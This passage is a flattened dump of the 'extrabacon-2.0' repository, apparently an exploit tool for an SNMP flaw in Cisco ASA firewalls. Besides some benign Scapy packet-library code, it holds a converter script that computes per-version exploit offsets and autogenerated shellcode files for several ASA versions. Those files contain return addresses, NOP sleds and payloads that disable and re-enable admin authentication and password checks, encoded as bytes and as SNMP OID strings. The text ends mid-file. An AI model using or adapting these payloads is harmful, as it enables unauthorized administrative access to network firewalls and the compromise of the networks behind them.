-= len(pad.load) 96 | pad = pad.payload 97 | self.ins.recv(x) 98 | return pkt 99 | 100 | 101 | 102 | if conf.L3socket is None: 103 | conf.L3socket = L3RawSocket 104 | 105 | import sendrecv 106 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/tools/check_asdis.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import getopt 4 | 5 | def usage(): 6 | print >>sys.stderr,"""Usage: check_asdis -i [-o ] 7 | -v increase verbosity 8 | -d hexdiff packets that differ 9 | -z compress output pcap 10 | -a open pcap file in append mode""" 11 | 12 | def main(argv): 13 | PCAP_IN = None 14 | PCAP_OUT = None 15 | COMPRESS=False 16 | APPEND=False 17 | DIFF=False 18 | VERBOSE=0 19 | try: 20 | opts=getopt.getopt(argv, "hi:o:azdv") 21 | for opt, parm in opts[0]: 22 | if opt == "-h": 23 | usage() 24 | raise SystemExit 25 | elif opt == "-i": 26 | PCAP_IN = parm 27 | elif opt == "-o": 28 | PCAP_OUT = parm 29 | elif opt == "-v": 30 | VERBOSE += 1 31 | elif opt == "-d": 32 | DIFF = True 33 | elif opt == "-a": 34 | APPEND = True 35 | elif opt == "-z": 36 | COMPRESS = True 37 | 38 | 39 | if PCAP_IN is None: 40 | raise getopt.GetoptError("Missing pcap file (-i)") 41 | 42 | except getopt.GetoptError,e: 43 | print >>sys.stderr,"ERROR: %s" % e 44 | raise SystemExit 45 | 46 | 47 | 48 | from scapy.config import conf 49 | from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff 50 | from scapy.layers import all 51 | 52 | 53 | pcap = RawPcapReader(PCAP_IN) 54 | pcap_out = None 55 | if PCAP_OUT: 56 | pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype) 57 | pcap_out._write_header(None) 58 | 59 | LLcls = conf.l2types.get(pcap.linktype) 60 | if LLcls is None: 61 | print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype 62 | raise SystemExit 63 | 64 | 65 | i=-1 66 | differ=0 67 | failed=0 68 | for p1,meta in pcap: 69 | i += 1 70 | try: 71 | p2d = LLcls(p1) 72 | p2 = str(p2d) 73 | except KeyboardInterrupt: 74 | raise 75 | except Exception,e: 76 | print "Dissection error on packet %i" % i 77 | failed += 1 78 | else: 79 | if p1 == p2: 80 | if VERBOSE >= 2: 81 | print "Packet %i ok" % i 82 | continue 83 | else: 84 | print "Packet %i differs" % i 85 | differ += 1 86 | if VERBOSE >= 1: 87 | print repr(p2d) 88 | if DIFF: 89 | hexdiff(p1,p2) 90 | if pcap_out is not None: 91 | pcap_out.write(p1) 92 | i+=1 93 | correct = i-differ-failed 94 | print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ, 95 | failed, i and 100.0*(correct)/i) 96 | 97 | 98 | if __name__ == "__main__": 99 | import sys 100 | try: 101 | main(sys.argv[1:]) 102 | except KeyboardInterrupt: 103 | print >>sys.stderr,"Interrupted by user." 104 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/converter.py: -------------------------------------------------------------------------------- 1 | from shellcode_asa803_6 import * 2 | #sc = __import__("shellcode_asa803-6") 3 | import binascii 4 | 5 | def xor_a5(bytes): 6 | ret = binascii.hexlify(bytes) 7 | ret = int(ret, 16) 8 | ret ^= 0xa5a5a5a5 9 | return ret 10 | 11 | def hex_to_snmp(hex, convert_endian = True): 12 | #if (len(hex_str) == 7): 13 | # hex_str = "0" + hex_str 14 | #print hex_str 15 | hex_str = "%08x" % hex 16 | octets = [hex_str[j:j+2] for j in range(0,len(hex_str),2)] 17 | octets = ".".join(reversed([str(int(i,16)) for i in octets])) 18 | return octets 19 | 20 | #safe_ret_snmp = ".".join(preamble_snmp.split(".")[1:5]) 21 | safe_ret_hex = preamble_byte[1:5] 22 | safe_ret_hex = safe_ret_hex[::-1] 23 | safe_ret_hex = xor_a5(safe_ret_hex) 24 | safe_ret_snmp = hex_to_snmp(safe_ret_hex) 25 | 26 | stack_clean_snmp = (preamble_snmp.split(".")[0x14]) 27 | stack_clean_hex = int(binascii.hexlify(preamble_byte[0x14]), 16) 28 | 29 | #pm_bounds_snmp = ".".join(payload_PMCHECK_DISABLE_snmp.split(".")[0xd:0x11]) 30 | pm_bounds_hex = payload_PMCHECK_DISABLE_byte[0xd:0x11][::-1] 31 | pm_bounds_hex = xor_a5(pm_bounds_hex) 32 | pm_bounds_snmp = hex_to_snmp(pm_bounds_hex) 33 | 34 | pm_addr_snmp = ".".join(payload_PMCHECK_DISABLE_snmp.split(".")[0x26:0x2a]) 35 | pm_addr_hex = payload_PMCHECK_DISABLE_byte[0x26:0x2a] 36 | pm_addr_hex = int(binascii.hexlify(pm_addr_hex[::-1]), 16) 37 | 38 | #aa_bounds_snmp = ".".join(payload_AAAADMINAUTH_DISABLE_snmp.split(".")[0xd:0x11]) 39 | aa_bounds_hex = payload_AAAADMINAUTH_DISABLE_byte[0xd:0x11] 40 | aa_bounds_hex = aa_bounds_hex[::-1] 41 | aa_bounds_hex = xor_a5(aa_bounds_hex) 42 | aa_bounds_snmp = hex_to_snmp(aa_bounds_hex) 43 | 44 | aa_addr_snmp = ".".join(payload_AAAADMINAUTH_DISABLE_snmp.split(".")[0x26:0x2a]) 45 | aa_addr_hex = payload_AAAADMINAUTH_DISABLE_byte[0x26:0x2a] 46 | aa_addr_hex = int(binascii.hexlify(aa_addr_hex[::-1]), 16) 47 | 48 | jmp_esp_snmp = my_ret_addr_snmp 49 | jmp_esp_hex = binascii.hexlify(my_ret_addr_byte[::-1]) 50 | jmp_esp_hex = int(jmp_esp_hex, 16) 51 | 52 | pm_code_snmp = ".".join(payload_PMCHECK_ENABLE_snmp.split(".")[0x1b:0x1f]) 53 | pm_code_hex = 0 54 | 55 | aa_code_snmp = ".".join(payload_AAAADMINAUTH_ENABLE_snmp.split(".")[0x1b:0x1f]) 56 | aa_code_hex = 0 57 | 58 | ''' 59 | saferet_offset = "134.177.3.9" # 0x0903b186 60 | jmp_esp_offset = "173.250.27.8" # 0x081bfaad 61 | admauth_offset = "96.49.8.8" # 0x08083160 62 | admauth_bounds = "0.48.8.8" # 0x08083000 63 | admauth_code = "85.137.229.87" # 0x5589e557 64 | pmcheck_offset = "176.119.127.9" # 0x097f77b0 65 | pmcheck_bounds = "0.112.127.9" # 0x097f7000 66 | pmcheck_code = "85.49.192.137" # 0x5531c089 67 | fix_ebp = "72" # 0x48 68 | #"VERS" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"] 69 | ''' 70 | ''' 71 | "9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0 72 | "134.115.39.9", # saferet_offset, 1 73 | "72", # fix_ebp, 2 74 | "0.128.183.9", # pmcheck_bounds, 3 75 | "16.128.183.9", # pmcheck_offset, 4 76 | "85.49.192.137", # pmcheck_code, 5 77 | "0.80.8.8", # admauth_bounds, 6 78 | "64.90.8.8", # admauth_offset, 7 79 | "85.137.229.87"], # admauth_code, 8 80 | ''' 81 | 82 | print('saferet_offset = "%s" # 0x%08x' % (safe_ret_snmp, safe_ret_hex)) 83 | print('jmp_esp_offset = "%s" # 0x%08x' % (jmp_esp_snmp, jmp_esp_hex)) 84 | print('admauth_offset = "%s" # 0x%08x' % (aa_addr_snmp, aa_addr_hex)) 85 | print('admauth_bounds = "%s" # 0x%08x' % (aa_bounds_snmp, aa_bounds_hex)) 86 | print('admauth_code = "%s" # 0x%08x' % (aa_code_snmp, aa_code_hex)) 87 | print('pmcheck_bounds = "%s" # 0x%08x' % (pm_bounds_snmp, pm_bounds_hex)) 88 | print('pmcheck_offset = "%s" # 0x%08x' % (pm_addr_snmp, pm_addr_hex)) 89 | print('pmcheck_code = "%s" # 0x%08x' % (pm_code_snmp, pm_code_hex)) 90 | print('fix_ebp = "%s" # 0x%02x' % (stack_clean_snmp, stack_clean_hex)) 91 | 92 | stuff = (jmp_esp_snmp, safe_ret_snmp, stack_clean_snmp, pm_bounds_snmp, pm_addr_snmp, pm_code_snmp, aa_bounds_snmp, aa_addr_snmp, aa_code_snmp) 93 | 94 | print('#"VERS" => ["%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s"]' % stuff) 95 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa802.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa802" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9b\xde\xd3\x08" 11 | 12 | my_ret_addr_snmp = "155.222.211.8" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x89\xc2\x3a\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.137.194.58.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x4d\x7c\x12\x09\x50\xb8\xe5\xac\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.77.124.18.9.80.184.229.172.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x4d\x7c\x12\x09\x50\xb8\xe5\xac\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.77.124.18.9.80.184.229.172.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\xa3\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x20\xed\x06\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.163.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.32.237.6.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x20\xed\x06\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\xa3\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.32.237.6.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.163.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\x5a\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.90.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x30\x5a\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.90.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa803.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa803" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x8d\x7b\x83\x09" 11 | 12 | my_ret_addr_snmp = "141.123.131.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x39\x2f\x05\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.57.47.5.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xfd\xbb\x53\x09\x50\xb8\x55\xa9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.253.187.83.9.80.184.85.169.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xfd\xbb\x53\x09\x50\xb8\x55\xa9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.253.187.83.9.80.184.85.169.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xac\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x70\x82\x09\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.172.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.112.130.9.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x70\x82\x09\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xac\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.112.130.9.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.172.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x60\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.96.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xb0\x60\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.96.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa803_6.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa803-6" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xbf\x8f\x18\x09" 11 | 12 | my_ret_addr_snmp = "191.143.24.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xb9\x3b\x04\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.185.59.4.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xfd\x95\x56\x09\x50\xb8\xa5\xb4\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.253.149.86.9.80.184.165.180.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xfd\x95\x56\x09\x50\xb8\xa5\xb4\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.253.149.86.9.80.184.165.180.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\xae\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xe0\x01\x0b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.174.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.224.1.11.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xe0\x01\x0b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\xae\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.224.1.11.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.174.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x70\x65\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.112.101.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x70\x65\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.112.101.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa804.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa804" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x6d\xbc\x1a\x09" 11 | 12 | my_ret_addr_snmp = "109.188.26.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 